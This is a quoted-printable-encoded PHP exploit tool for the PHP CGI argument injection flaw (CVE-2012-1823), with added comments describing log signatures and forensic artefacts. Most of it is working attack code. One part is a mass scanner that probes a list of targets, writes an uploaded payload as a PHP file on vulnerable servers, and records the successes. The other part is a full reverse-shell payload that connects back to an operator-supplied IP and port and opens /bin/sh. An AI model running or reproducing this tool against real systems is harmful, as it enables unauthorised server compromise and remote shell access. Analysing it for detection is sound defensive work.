PHP CGI Argument Injection Remote Exploit V0.3 - PHP Version
<?php
######################################### www.bugreport.ir ########################################
#
# Title: PHP CGI Argument Injection Remote Exploit V0.3 - PHP Version
# Vendor: http://www.php.net
# Vulnerable Version: PHP up to version 5.3.12 and 5.4.2
# Exploitation: Remote
# Original Advisory: http://eindbazen.net/2012/05/php-cgi-advisory-cve-2012-1823/
# Original Exploit URL: http://www.bugreport.ir/79/exploit.htm
# CVE: CVE-2012-1823
# Coded By: Mostafa Azizi (admin[@]0-Day[dot]net)
###################################################################################################
/* This tool may be used for legal purposes only. Users take full responsibility for any actions
performed using this tool. The author accepts no liability for damage caused by this tool. If
these terms are not acceptable to you, then do not use this tool.*/
/* Runtime setup for a long-running scanner: PHP diagnostics are silenced, the
   execution-time limit is removed, socket operations time out after 10 s, and
   output is flushed as it is produced so per-target results stream to the browser.
   (This listing is quoted-printable encoded: "=3D" stands for "=", "=20" for a
   trailing space, "=09" for a tab, and a bare "=" at end of line is a soft line
   break; the text is an archive artefact, not a file PHP would parse as-is.) */
error_reporting(0);
ini_set("max_execution_time",0);
ini_set("default_socket_timeout", 10);
ob_implicit_flush (1);
/* Operator-facing HTML front end, emitted before any input is processed.
   Two forms post back to this script: the left one ("Submit") takes a target
   list file (listfile), a payload file (datafile), an optional port and an
   optional ip:port proxy; the right one ("Submit2") takes a single host plus
   the listener IP (lip) and port (lport) used by the reverse-shell branch. */
echo'<html>
<head>
<title>PHP CGI Argument Injection Remote Exploit</title>
</head>
<p align=3D"center"><font size=3D"4" color=3D"#5E767E">PHP CGI Argument =20
Injection</font></p>
<p align=3D"center"><font size=3D"3" color=3D"#4E8975">Coded by: Mostafa =20
Azizi (admin[@]0-Day[dot]net)</font></p>
<body bgcolor=3D"#00000">
<table align=3D"center" border=3D"5">
<tr>
<th><p align=3D"center"><font size=3D"4" color=3D"#8BB381">Mass File =
=20
Uploader</font></p>
</th>
<th></th>
<th><p align=3D"center"><font size=3D"4" color=3D"#8BB381">Reverse =20
Shell</font></p>
</th>
</tr>
<tr>
<td><form name=3D"form1" action=3D"'.$SERVER[PHP_SELF].'" =20
enctype=3D"multipart/form-data" method=3D"post">
</br>
<p></font><font color=3D"#FFF8C6" >Please specify a file to =20
scan: </font></br><input type=3D"file" name=3D"listfile" =20
size=3D"40"><font color=3D"#FF0000"> * </font>
<p></font><font color=3D"#FFF8C6" >Please specify a file to =20
upload: </font></br><input type=3D"file" name=3D"datafile" =20
size=3D"40"><font color=3D"#FF0000"> * </font>
<p><font color=3D"#FFF8C6" > specify a port (default is 80): =20
</font></br><input name=3D"port" size=3D"20"><span =20
class=3D"Stile5"></span></p>
<p><font color=3D"#FFF8C6" > Proxy (ip:port): =20
</font></br><input name=3D"proxy" size=3D"20"><span =20
class=3D"Stile5"></span></p>
<p align=3D"center"> <span class=3D"Stile5"><font =20
color=3D"#FF0000">* </font><font color=3D"white" >fields are =20
required</font></font></span></p>
</br>
<p align=3D"center"><input type=3D"submit" value=3D"Start Attack"=
=20
name=3D"Submit"></p>
</form> </td>
<td></td>
<td><form name=3D"form1" action=3D"'.$SERVER[PHP_SELF].'" =20
enctype=3D"multipart/form-data" method=3D"post">
</br>
<p></font><font color=3D"#FFF8C6" > hostname (ex: =20
www.sitename.com):</font></br><input name=3D"host" size=3D"20"> <span =20
class=3D"Stile5"></span></p>
<p></font><font color=3D"#FFF8C6" > Your IP (ex: =20
173.194.35.169 ): </font></br><input name=3D"lip" size=3D"20"> =
=20
<span class=3D"Stile5"></span></p>
<p><font color=3D"#FFF8C6" > Your Port (ex: =20
80):</font></br><input name=3D"lport" size=3D"20"> <span =20
class=3D"Stile5"></span></p>
</br></br>
<p align=3D"center"> <span class=3D"Stile5"><font =20
color=3D"#FF0000">All </font><font color=3D"white" >fields are =20
required</font></font></span></p>
</br>
<p align=3D"center"><input type=3D"submit" value=3D"Start Attack"=
=20
name=3D"Submit2"></p>
</form> </td>
</tr>
</table>
</font>
<table width=3D"90%">
<tbody>
<tr>
<td width=3D"43%" align=3D"left">
</td>
</tr>
</tbody>
</table>
</body></html>';
/* Operator input, read straight from the submitted form. Nothing is validated
   here; the two branches below only check for non-empty values. */
$host =3D $_POST['host'];
$lip =3D $_POST['lip'];
$lport =3D $_POST['lport'];
$port =3D $_POST['port'];
$proxy =3D $_POST['proxy'];
/* The uploaded target list is read one URL per line. The uploaded payload is
   gzdeflate'd and base64'd so that $shell becomes the self-decoding PHP expression
   gzinflate(base64_decode("...")) -- it is this wrapper, not the plaintext payload,
   that Exploit() later writes to disk on a target. */
$list =3D file($_FILES['listfile']['tmp_name']);
$file =3D =20
base64_encode(gzdeflate(file_get_contents($_FILES['datafile']['tmp_name'])))=
;
$shell =3D "gzinflate(base64_decode(\"$file\"))";
/* Branch 1 ("Submit2"): reverse shell against a single host. The request body is
   pentestmonkey's php-reverse-shell with the operator's IP/port substituted; the
   query string "-d allow_url_include=1 -d auto_prepend_file=php://input" is the
   CVE-2012-1823 php-cgi argument injection that makes the target execute that
   body. Detection/forensics: that query string and the User-Agent
   "PHP CGI Argument Injection Exploiter" sent below are literal, high-fidelity
   web-log signatures; on the host the body runs "uname -a; w; id; /bin/sh -i"
   under the web-server user, so a web-server process spawning "/bin/sh -i" with
   an outbound connection is the host-side indicator. */
if (isset($_POST['Submit2']) && $host !=3D '' && $lip !=3D '' && $lport !=3D=
'')
{
=09/*pentestmonkey's php-reverse-shell.
=09Limitations: proc_open and stream_set_blocking require PHP version =20
4.3+, or 5+ */
/* Connect Back */
=09$payload =3D "<?php set_time_limit (0); \$VERSION =3D \"1.0\"; \$ip =3D =
=20
'$lip'; \$port =3D $lport; \$chunk_size =3D 1400; \$write_a =3D null; =20
\$error_a =3D null; \$shell =3D 'uname -a; w; id; /bin/sh -i'; \$daemon =3D =
=20
0;\$debug =3D 0; if (function_exists('pcntl_fork')) { \$pid =3D =20
pcntl_fork(); if (\$pid =3D=3D -1) { printit(\"ERROR: Can't fork\"); =20
exit(1);} if (\$pid) { exit(0);} if (posix_setsid() =3D=3D -1) { =20
printit(\"Error: Can't setsid()\"); exit(1); } \$daemon =3D 1;} else { =20
printit(\"WARNING: Failed to daemonise. This is quite common and not =20
fatal.\");}chdir(\"/\"); umask(0); \$sock =3D fsockopen(\$ip, \$port, =20
\$errno, \$errstr, 30);if (!\$sock) { printit(\"\$errstr (\$errno)\"); =20
exit(1);} \$descriptorspec =3D array(0 =3D> array(\"pipe\", \"r\"),1 =3D> =
=20
array(\"pipe\", \"w\"), 2 =3D> array(\"pipe\", \"w\"));\$process =3D =20
proc_open(\$shell, \$descriptorspec, \$pipes);if =20
(!is_resource(\$process)) { printit(\"ERROR: Can't spawn shell\"); =20
exit(1);}stream_set_blocking(\$pipes[0], =20
0);stream_set_blocking(\$pipes[1], 0);stream_set_blocking(\$pipes[2], =20
0);stream_set_blocking(\$sock, 0);printit(\"Successfully opened =20
reverse shell to \$ip:\$port\"); while (1) { if (feof(\$sock)) { =20
printit(\"ERROR: Shell connection terminated\"); break;} if =20
(feof(\$pipes[1])) {printit(\"ERROR: Shell process =20
terminated\");break;}\$read_a =3D array(\$sock, \$pipes[1], =20
\$pipes[2]);\$num_changed_sockets =3D stream_select(\$read_a, \$write_a, =20
\$error_a, null);if (in_array(\$sock, \$read_a)) {if (\$debug) =20
printit(\"SOCK READ\");\$input =3D fread(\$sock, =20
\$chunk_size);if(\$debug) printit(\"SOCK: =20
\$input\");fwrite(\$pipes[0], \$input);}if (in_array(\$pipes[1], =20
\$read_a)) {if (\$debug) printit(\"STDOUT READ\");\$input =3D =20
fread(\$pipes[1], \$chunk_size);if (\$debug) printit(\"STDOUT: =20
\$input\");fwrite(\$sock, \$input);}if (in_array(\$pipes[2], =20
\$read_a)) {if (\$debug) printit(\"STDERR READ\");\$input =3D =20
fread(\$pipes[2], \$chunk_size); if (\$debug) printit(\"STDERR: =20
\$input\");fwrite(\$sock, =20
\$input);}}fclose(\$sock);fclose(\$pipes[0]);fclose(\$pipes[1]);fclose(\$pip=
es[2]);proc_close(\$process);function printit (\$string) {if (!\$daemon) {pr=
int \"\$string\n\";}} =20
?>";
/* Raw HTTP/1.1 POST: Content-Length is the payload size and four CRLF pairs are
   appended after the body. sendpacket() stores the reply in global $html. */
=09$packet =3D "POST =20
".$p."/?-d+allow_url_include%3d1+-d+auto_prepend_file%3dphp://input =20
HTTP/1.1\r\n";
=09$packet .=3D "Host: ".$host."\r\n";
=09$packet .=3D "User-Agent: PHP CGI Argument Injection Exploiter\r\n";
=09$packet .=3D "Content-Type: application/x-www-form-urlencoded\r\n";
=09$packet .=3D "Content-Length: ".strlen($payload)."\r\n\r\n";
=09$packet .=3D $payload."\r\n\r\n\r\n\r\n";
=09sendpacket($packet,1,0,0);
}elseif (isset($_POST['Submit']) && $list !=3D '' && $file !=3D '')
{
/* Branch 2 ("Submit"): mass upload across every target in the list. The port
   defaults to 80. For each line the regex below splits the URL into host and
   directory path; reachable hosts go to Exploitable(), unreachable ones are
   appended to notconnected.txt next to this script (a forensic artefact of the
   tool, together with shell.txt written by Exploit()). */
if ($port=3D=3D'') {$port=3D80;}
=09for ($n =3D0; $n < count($list); $n++)
{
$siteAddbackup =3D $list[$n];
$siteAdd=3Dstr_replace("http://","",$siteAddbackup);
// Capture group 1 is the directory part ("/dir/") when the URL names a file;
// otherwise $match[1] is unset and, with errors silenced, $path falls back to "/".
=20
preg_match('/^(?:(?:http|https):\/\/)?[^\/]+(\/.+\/)[^\/\.]+\.[^\/\.]+$/i',$=
siteAddbackup, =20
$match);
=09=09$path =3D $match[1];
=09=09$pa =3D strstr(trim($siteAdd),$path);
=09=09$host=3Dtrim(str_replace($pa,"",$siteAdd));
=09=09if ($path =3D=3D''){$path =3D "/"; }
// $p is the request target: path only for a direct connection, an absolute
// http://host/path URL when the request goes through the proxy.
if ($proxy=3D=3D'') {$p=3D$path;} else {$p=3D'http://'.$host.$path;=
}
/* Checking =20
Availability */
// Plain TCP connect to $host:$port; no HTTP is exchanged at this point.
=09=09$connection =3D fsockopen($host,$port);
=09=09if (!$connection)
// site is down
{
echo '<font color=3Dred> No response from =20
'.htmlentities($host).' ...<br></font>';
=20
file_put_contents(realpath(dirname(__FILE__)).'/notconnected.txt', =20
$siteAddbackup."\r\n", FILE_APPEND);
}
=09=09else
// site is up
{
fclose($connection);
Exploitable($host,$path,$p);
}
}
}
/**
 * Vulnerability probe for one target.
 *
 * Sends "GET <path>?-s". With CVE-2012-1823 the query string reaches php-cgi as
 * command-line arguments, and "-s" makes it print the script's own
 * syntax-highlighted source instead of running it. If the reply (global $html,
 * filled by sendpacket()) contains both '<code><span' and '<?' the target is
 * reported as Exploitable and handed to Exploit(); zero hits prints "Faild!";
 * exactly one hit prints nothing (there is no case 1).
 *
 * @param string $host  target host name
 * @param string $path  directory path on the target
 * @param string $p     request target: the path, or an absolute URL when a proxy is set
 *
 * Detection: a GET whose query string is exactly "-s", together with the
 * User-Agent sent below, is a low-noise log signature of this scan; the
 * mitigation is a PHP build newer than the versions named in the file header.
 */
Function Exploitable($host,$path,$p)
{
global $html;
$i=3D0;
/* Checking Exploitability */
=09$packet =3D "GET ".$p."?-s HTTP/1.1\r\n";
=09$packet .=3D "Host: ".$host."\r\n";
=09$packet .=3D "User-Agent: PHP CGI Argument Injection Exploiter \r\n\r\n";
=09sendpacket($packet,1,0,0);
// Two markers of highlighted PHP source; $i counts how many appear in the reply.
=09$str =3D array(
=09=09'<code><span','<?');
=09=09foreach ($str as $value =3D> $search){
=09=09=09if(stristr($html, $search) =3D=3D TRUE)
{$i=3D$i+1;}}
=09switch($i)
=09{
=09case 0:
=09echo '<font color=3Dred>'.$host.' Faild!<br></font>';
=09break;
=09case 2:
=09echo '<font color=3D#FFF8C6>'.$host.' Exploitable<br></font>';
=09Exploit($host,$path,$p);
=09}
}
/**
 * Drops the operator's payload on a target that Exploitable() judged vulnerable.
 *
 * The injected body is a short PHP stub that opens "legalpentest.php" in the
 * target's current directory for writing and stores global $shell (the
 * gzinflate(base64_decode(...)) wrapper built at top level). It is delivered
 * with the same "auto_prepend_file=php://input" argument injection as the
 * reverse-shell branch. A HEAD request for <path>/legalpentest.php then decides
 * the outcome: a reply containing "404 Not Found" is reported as failure,
 * anything else as success, and on success the URL is appended to shell.txt
 * beside this script.
 *
 * @param string $host  target host name
 * @param string $path  directory path on the target
 * @param string $p     request target: the path, or an absolute URL when a proxy is set
 *
 * Forensics: a file named legalpentest.php in a web directory whose content is a
 * single gzinflate(base64_decode(...)) expression, and a HEAD request carrying
 * User-Agent ":)", are artefacts of this tool.
 */
Function Exploit($host,$path,$p)
{
global $html, $shell;
/* Exploiting */
=09$payload =3D "<?php \$myFile =3D \"legalpentest.php\"; \$filehandle =3D =
=20
fopen(\$myFile, 'w') or die(\"can't open file\"); \$Data=3D$shell; =20
fwrite(\$filehandle, \$Data);fclose(\$filehandle);";
=09$packet =3D "POST =20
".$p."/?-d+allow_url_include%3d1+-d+auto_prepend_file%3dphp://input =20
HTTP/1.1\r\n";
=09$packet .=3D "Host: ".$host."\r\n";
=09$packet .=3D "User-Agent: PHP CGI Argument Injection Exploiter\r\n";
=09$packet .=3D "Content-Type: application/x-www-form-urlencoded\r\n";
=09$packet .=3D "Content-Length: ".strlen($payload)."\r\n\r\n";
=09$packet .=3D $payload."\r\n\r\n\r\n\r\n";
=09sendpacket($packet,1,0,0);
/* Check for successfully =20
uploaded */
// Only the status line matters here; the reply is again left in global $html.
=09$packet =3D "HEAD ".$p."/legalpentest.php HTTP/1.1\r\n";
=09$packet .=3D "Host: ".$host."\r\n";
=09$packet .=3D "User-Agent: :) \r\n\r\n";
=09sendpacket($packet,1,0,0);
=09if(stristr($html , '404 Not Found') =3D=3D true)
=09=09{
=09=09echo '<font color=3D#FFF8C6><br>Exploit =20
Faild...<br>-------------------------------------------------------<br></fon=
t>';
=09=09}
=09=09else {
=09=09echo "<font color=3D#FFF8C6><br>Exploit =20
Succeeded...<br>-------------------=" rel="nofollow">http://$host$path"."/legalpentest.php<br>-------------------=
------------------------------------<br></font>";
=09=09file_put_contents(realpath(dirname(__FILE__)).'/shell.txt', =20
"http://$host$path"."/legalpentest.php\r\n", FILE_APPEND);
=09=09}
}
/**
 * Sends one raw HTTP request and, optionally, captures the reply.
 *
 * Connects to global $host:$port directly, or to the ip:port held in global
 * $proxy, writes $packet verbatim and, when $response == 1, stores the whole
 * reply in global $html (reset to '' first). Direct connections are read with
 * fgets() until EOF; proxied ones are read one byte at a time until EOF or
 * until the CRLFCRLF header terminator appears (checked with eregi(), which
 * was removed in PHP 7). When $response is not 1, $html is cleared instead.
 *
 * @param string $packet    complete request, headers and body included
 * @param int    $response  1 to read and keep the reply, anything else to discard it
 * @param int    $output    accepted but never used
 * @param int    $s         accepted but never used
 *
 * $proxy_regex is assigned but never used, and $user/$pass are declared global
 * but never read. With error_reporting(0) a failed connect only prints
 * "No response"; the stream_set_timeout()/fclose() calls on the false handle
 * are silent, and the function then returns without touching $html.
 */
function sendpacket($packet,$response =3D 0,$output =3D 0,$s=3D0)
{
$proxy_regex =3D '(\b\d{1,3}\.\d{1,3}\.\d{1,3}\.\d{1,3}\:\d{1,5}\b)';
global $proxy, $host, $port, $html, $user, $pass;
if ($proxy =3D=3D '')
{
// Direct connection; 5 s read/write timeout on the socket.
$ock =3D fsockopen($host,$port);
stream_set_timeout($ock, 5);
if (!$ock)
{
echo 'No response from '.htmlentities($host).' ...<br>';
stream_set_timeout($ock, 4);
}
} else
{
// Proxy given as "ip:port"; the packet's request target must be an absolute URL.
$parts =3D explode(':',$proxy);
// echo '<font color=3Dwhite>Connecting to proxy: =20
'.$parts[0].':'.$parts[1].' ...<br><br/></font>';
$ock =3D fsockopen($parts[0],$parts[1]);
stream_set_timeout($ock, 5);
if (!$ock)
{
echo 'No response from proxy...<br>';
fclose($ock);
}
}
if ($ock)
{
fputs($ock,$packet);
if ($response =3D=3D 1)
{
if ($proxy =3D=3D '')
{
// Read until the server closes the connection.
$html =3D '';
while (!feof($ock))
{
$html .=3D fgets($ock);
}
} else
{
// Byte-wise read that stops at EOF or at the end of the header block.
$html =3D '';
while ((!feof($ock)) or =20
(!eregi(chr(0x0d).chr(0x0a).chr(0x0d).chr(0x0a),$html)))
{
$html .=3D fread($ock,1);
}
}
} else $html =3D '';
fclose($ock);
}
}
?>